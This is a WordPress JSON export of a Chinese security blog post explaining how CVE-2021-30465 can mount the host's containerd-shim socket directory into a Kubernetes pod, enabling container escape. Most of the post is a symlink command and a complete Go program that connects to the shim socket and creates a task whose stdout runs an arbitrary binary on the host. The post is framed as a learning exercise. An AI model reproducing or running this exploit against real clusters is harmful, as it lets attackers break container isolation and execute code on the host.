{"id":523,"date":"2023-07-17T22:47:56","date_gmt":"2023-07-17T14:47:56","guid":{"rendered":"https:\/\/h4ckm310n.com\/?p=523"},"modified":"2023-07-18T10:22:10","modified_gmt":"2023-07-18T02:22:10","slug":"%e8%a1%8d%e7%94%9f%e5%ad%a6%e4%b9%a0%ef%bc%9a%e5%88%a9%e7%94%a8cve-2021-30465%e8%ae%bf%e9%97%aecontainerd-shim-socket%e5%b9%b6%e5%ae%9e%e7%8e%b0%e9%80%83%e9%80%b8","status":"publish","type":"post","link":"https:\/\/h4ckm310n.com\/?p=523","title":{"rendered":"\u884d\u751f\u5b66\u4e60\uff1a\u5229\u7528CVE-2021-30465\u8bbf\u95eecontainerd-shim socket\u5e76\u5b9e\u73b0\u9003\u9038"},"content":{"rendered":"<p>\u5728\u4e4b\u524dCVE-2020-15257\u7684\u5b66\u4e60\u4e2d\u63d0\u5230\u4e86\u8be5\u6f0f\u6d1e\u7684\u4fee\u590d\u65b9\u5f0f\u662f\u628a\u539f\u672c\u7684\u62bd\u8c61socket\u66ff\u6362\u6210\u6587\u4ef6socket\uff0c\u8fd9\u6837\u8fd9\u4e9bsocket\u5c31\u80fd\u591f\u53d7\u5230mount namespace\u7684\u9694\u79bb\u3002\u800c\u5229\u7528CVE-2021-30465\u53ef\u4ee5\u6302\u8f7d\u5bbf\u4e3b\u4e2d\u7684\u4efb\u610f\u76ee\u5f55\u5230\u5bb9\u5668\u4e2d\uff0c\u4e5f\u5c31\u662f\u8bf4\u5229\u7528\u8be5\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u628acontainerd-shim socket\u6240\u5728\u7684\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u4e2d\uff0c\u4ece\u800c\u5b9e\u73b0\u5728\u5bb9\u5668\u4e2d\u8bbf\u95ee\u8fd9\u4e9bsocket\u5e76\u5b9e\u73b0\u9003\u9038\u3002<\/p>\n<p>\u524d\u7f6e\u9605\u8bfb\uff1a<br \/>\n<a href=\"https:\/\/h4ckm310n.com\/?p=341\" target=\"_blank\" rel=\"noopener\">CVE-2020-15257\u5b66\u4e60<\/a><br \/>\n<a href=\"https:\/\/h4ckm310n.com\/?p=413\" target=\"_blank\" rel=\"noopener\">CVE-2021-30465\u5b66\u4e60<\/a><br \/>\n<!--more--><br 
\/>\n\u9996\u5148\uff0c\u8ddfCVE-2021-30465\u7684\u590d\u73b0\u6b65\u9aa4\u4e00\u6837\uff0c\u521b\u5efa\u4e00\u4e2apod\u3002\u4e0b\u4e00\u4e2a\u521b\u5efa\u7b26\u53f7\u94fe\u63a5\u7684\u6b65\u9aa4\u6709\u4e00\u4e2a\u4e0d\u540c\u7684\u5730\u65b9\uff0c\u4e4b\u524d\u7684\u590d\u73b0\u6b65\u9aa4\u91cc\u662f\u6307\u5411\u5bbf\u4e3b\u6839\u76ee\u5f55\uff0c\u8fd9\u91cc\u6211\u76f4\u63a5\u6307\u5411\u7684\u662fcontainerd-shim socket\u6240\u5728\u7684\u76ee\u5f55\uff08\u5f53\u7136\u50cf\u4e4b\u524d\u90a3\u6837\u6307\u5411\u6839\u76ee\u5f55\u4e5f\u80fd\u591f\u8bbf\u95ee\u5230\u8fd9\u4e9bsocket\uff09\u3002<\/p>\n<pre>ln -s \/run\/containerd\/s\/ \/test2\/test2\r\n<\/pre>\n<p>\u540e\u9762\u7684\u6b65\u9aa4\u4e5f\u5dee\u4e0d\u591a\uff0c\u5229\u7528\u6761\u4ef6\u7ade\u4e89\u5c06\/run\/containerd\/s\/\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u7684\/test1\/zzz\/\u4e0a\u3002<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-526\" src=\"https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount.png\" alt=\"\" width=\"1842\" height=\"212\" srcset=\"https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount.png 1842w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-300x35.png 300w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-1024x118.png 1024w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-768x88.png 768w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-1536x177.png 1536w\" sizes=\"auto, (max-width: 1842px) 100vw, 1842px\" 
\/><\/p>\n<p>\u8fdb\u5165\u6210\u529f\u6302\u8f7d\u76ee\u5f55\u7684\u5bb9\u5668\u91cc\uff0c\u4f7f\u7528\u8ddfCVE-2020-15257\u7c7b\u4f3c\u7684\u65b9\u5f0f\u5411\u5176\u4e2d\u4efb\u4e00socket\u53d1\u8d77\u8bf7\u6c42\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5728\u8fd9\u91cc\u7684\u73af\u5883\u4e2d\uff0ccontainerd\u9ed8\u8ba4\u7528\u7684\u662fv2\u7684shim\uff08\u4e4b\u524d\u7684\u590d\u73b0\u4e2d\u7528\u7684\u662fv1\uff09\uff0c\u4f7f\u7528\u8d77\u6765\u6709\u70b9\u533a\u522b\uff1a<\/p>\n<pre>package main\r\n\r\nimport (\r\n    \"context\"\r\n    \"net\"\r\n    \"github.com\/containerd\/ttrpc\"\r\n    shimapi \"github.com\/containerd\/containerd\/runtime\/v2\/task\"\r\n)\r\n\r\nfunc main() {\r\n    sock := \"\/test1\/zzz\/2665e78a394db764567c4690a5af0718ae0e0dc7292756ee8771295f69f4c7c7\"\r\n    container_id := \"f88a70eec15af27dbe668a5df963942b0d2fa6486209fab139e8278e6602f697\"\r\n    fs := \"\/var\/lib\/rancher\/k3s\/agent\/containerd\/io.containerd.snapshotter.v1.overlayfs\/snapshots\/157\/fs\/\"\r\n    \r\n    conn, _ := net.Dial(\"unix\", sock)\r\n    client := ttrpc.NewClient(conn)\r\n    shimClient := shimapi.NewTaskClient(client)\r\n    ctx := context.Background()\r\n    md := ttrpc.MD{} \r\n    md.Set(\"containerd-namespace-ttrpc\", \"notmoby\")\r\n    ctx = ttrpc.WithMetadata(ctx, md)\r\n\r\n    shimClient.Create(ctx, &amp;shimapi.CreateTaskRequest{\r\n        ID: container_id,\r\n        Bundle: \"\/run\/k3s\/containerd\/io.containerd.runtime.v2.task\/k8s.io\/\" + container_id,\r\n        Stdout: \"binary:\/\/\/bin\/sh?-c=\"+fs+\"shell\",\r\n    })\r\n}\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u5728\u4e4b\u524dCVE-2020-15257\u7684\u5b66\u4e60\u4e2d\u63d0\u5230\u4e86\u8be5\u6f0f\u6d1e\u7684\u4fee\u590d\u65b9\u5f0f\u662f\u628a\u539f\u672c\u7684\u62bd\u8c61socket\u66ff\u6362\u6210\u6587\u4ef6socke 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[16,6],"tags":[],"class_list":["post-523","post","type-post","status-publish","format-standard","hentry","category-16","category-6"],"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false},"uagb_author_info":{"display_name":"h4ckm310n","author_link":"https:\/\/h4ckm310n.com\/?author=1"},"uagb_comment_info":0,"uagb_excerpt":"\u5728\u4e4b\u524dCVE-2020-15257\u7684\u5b66\u4e60\u4e2d\u63d0\u5230\u4e86\u8be5\u6f0f\u6d1e\u7684\u4fee\u590d\u65b9\u5f0f\u662f\u628a\u539f\u672c\u7684\u62bd\u8c61socket\u66ff\u6362\u6210\u6587\u4ef6socke&hellip;","_links":{"self":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/523","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=523"}],"version-history":[{"count":3,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/523\/revisions"}],"predecessor-version":[{"id":527,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/523\/revisions\/527"}],"wp:attachment":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=523"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=523"}],"cur
ies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}